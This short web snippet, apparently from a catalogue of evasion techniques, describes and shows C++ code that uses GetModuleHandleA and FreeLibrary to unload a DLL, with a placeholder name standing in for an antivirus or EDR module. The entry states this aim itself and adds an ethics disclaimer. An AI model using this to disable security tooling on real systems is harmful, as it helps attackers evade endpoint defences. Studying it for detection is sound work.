(C++) Unloading Module with FreeLibrary by West Wind

Created the Sunday 19 March 2023. Updated 2 days, 15 hours ago.

Description:

This code demonstrates how the GetModuleHandleA and FreeLibrary functions can be used to unload a DLL from a process's memory.

GetModuleHandleA retrieves a handle to a module (such as a DLL) that is already loaded.
FreeLibrary frees a loaded DLL from the process's memory.

This technique can be used maliciously to unload security-related DLLs used by antivirus or EDR solutions. As such, it is important to use such code ethically and responsibly, within the bounds of the law and ethical considerations.

Code

            #include <windows.h>

int main()
{
  HMODULE hLibModule = GetModuleHandleA("av_edr_dllName.dll");
  FreeLibrary(hLibModule);
  return 0;
}

Download Raw